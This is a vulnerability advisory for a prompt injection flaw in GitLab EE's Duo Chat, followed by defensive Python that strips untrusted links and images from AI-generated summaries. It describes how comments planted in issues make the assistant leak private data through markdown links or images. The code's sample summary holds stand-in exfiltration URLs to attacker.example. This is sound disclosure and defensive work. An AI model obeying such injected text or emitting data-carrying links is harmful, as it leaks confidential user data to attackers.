GitLab
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*
- >= 16.0, < 17.6.5
- >= 17.7, < 17.7.4
- >= 17.8, < 17.8.2
A prompt injection vulnerability has been identified in GitLab EE versions 16.0 prior to 17.6.5, 17.7 prior to 17.7.4, and 17.8 prior to 17.8.2. This vulnerability allows an attacker to exfiltrate information from private issues by injecting prompts that are processed by the application's AI features. The attack involves manipulating issue comments to create links or images that, when accessed, leak confidential data to the attacker.
Exploitation of this vulnerability allows for the unauthorized access and exfiltration of sensitive information from private issues and internal comments, potentially including confidential tokens and other private data.
The vulnerability can be reproduced by an attacker who adds a prompt injection payload into a public issue's comments. When a victim accesses the issue and uses the Duo Chat feature to generate a summary, the injected prompt can be executed, causing private issue data or internal comments to be leaked through a markdown link or an image. This process can be automated to extract information more efficiently.
Users can update to GitLab versions 17.8.2, 17.7.4, or 17.6.5 (the patched release for the 16.0 through 17.6 series) to address this vulnerability.
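The leak channel described above is a markdown link or image that the AI response renders in the victim's browser, so a rendering-side control complements the upgrade: treat AI-generated markdown as untrusted output and neutralise any link or image that would make the browser contact a host outside the instance. The following is an added, illustrative example and is not GitLab's code; the trusted host name, the sample summary and the attacker URLs in it are constructed for the example.

```python
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Assumption for the example: the instance's own host is the only origin a
# rendered AI response may link to. A real deployment would take this from config.
TRUSTED_HOSTS = {"gitlab.example.internal"}

# Markdown inline image ![alt](url "title") or link [text](url "title")
_INLINE = re.compile(r'(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)')
# Raw HTML <img ...>, <a ...>, </a> that many markdown renderers pass through
_HTML_TAG = re.compile(r'</?(?:img|a)\b[^>]*>', re.IGNORECASE)
_HTML_URL = re.compile(r'(?:src|href)\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
# Autolink <https://...> and bare URLs (GFM-style renderers auto-link bare URLs too)
_AUTOLINK = re.compile(r'<(https?://[^\s>]+)>', re.IGNORECASE)
_BARE_URL = re.compile(r'(?<![`(<\w])https?://[^\s<>`)]+', re.IGNORECASE)


def is_trusted_url(url: str) -> bool:
    """Allow same-site relative paths and absolute http(s) URLs on trusted hosts only."""
    parts = urlsplit(url.strip())
    if not parts.scheme and not parts.netloc:
        return True                      # e.g. /group/proj/-/issues/1
    if parts.scheme.lower() not in ("http", "https"):
        return False                     # javascript:, data:, protocol-relative //host
    host = (parts.hostname or "").lower()
    return host in TRUSTED_HOSTS


def sanitize_ai_markdown(text: str) -> tuple[str, list[str]]:
    """Return (safe_markdown, blocked_urls).

    Images are never rendered from AI output (a summary has no legitimate need
    for one), so they collapse to their alt text. Links survive only when they
    point at a trusted host; everything else becomes inert text, so the victim's
    browser never issues a request that could carry private data off-site.
    """
    blocked: list[str] = []

    def inline(m: re.Match) -> str:
        is_image, label, url = m.group(1) == "!", m.group(2), m.group(3)
        if not is_image and is_trusted_url(url):
            return m.group(0)
        blocked.append(url)
        return label

    def html_tag(m: re.Match) -> str:
        blocked.extend(_HTML_URL.findall(m.group(0)))
        return ""                        # drop the tag, keep surrounding text

    def defang(m: re.Match) -> str:
        url = m.group(1) if m.lastindex else m.group(0)
        if is_trusted_url(url):
            return m.group(0)
        blocked.append(url)
        return f"`{url}`"                # code span: renderers will not auto-link it

    # Repeat until stable so nested forms like [![alt](img)](link) are fully unwrapped;
    # every untrusted match shrinks the text, so the loop terminates.
    out = text
    while True:
        new = _INLINE.sub(inline, out)
        if new == out:
            break
        out = new
    out = _HTML_TAG.sub(html_tag, out)
    out = _AUTOLINK.sub(defang, out)
    out = _BARE_URL.sub(defang, out)
    return out, blocked


# Constructed sample of a summary after injection; hosts and values are made up.
SAMPLE_SUMMARY = """Summary of issue #42 (constructed sample)
![status](https://attacker.example/collect?d=EXAMPLE_SECRET)
See [the design doc](https://attacker.example/x?t=EXAMPLE_SECRET) and [the MR](https://gitlab.example.internal/group/proj/-/merge_requests/7).
<img src="https://attacker.example/pixel.gif?v=abc">
<https://attacker.example/auto?q=1>
Also http://attacker.example/bare?z=2 here.
"""

if __name__ == "__main__":
    safe, blocked = sanitize_ai_markdown(SAMPLE_SUMMARY)
    print(safe)
    print("blocked:", blocked)
```

Run as a script, it prints the sanitised summary and the list of URLs that were removed; that list is worth logging, since a burst of blocked off-site URLs in AI output is itself a useful detection signal for injection attempts against the feature.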